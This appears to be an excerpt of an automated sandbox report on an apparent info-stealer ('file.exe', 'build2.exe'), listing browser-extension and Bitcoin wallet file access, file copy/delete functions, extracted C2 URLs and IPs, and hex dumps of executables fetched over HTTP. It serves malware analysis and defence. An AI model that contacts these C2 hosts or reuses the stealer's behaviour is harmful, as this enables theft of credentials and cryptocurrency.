0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 74MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	URLs: http://85.28.47.31silence
Source: Malware configuration extractor	IPs: 185.215.113.19
Source: Malware configuration extractor	URLs: 185.215.113.9:9137

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:61197 -> 185.215.113.9:9137

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.5:55731 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:60231 -> 1.1.1.1:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 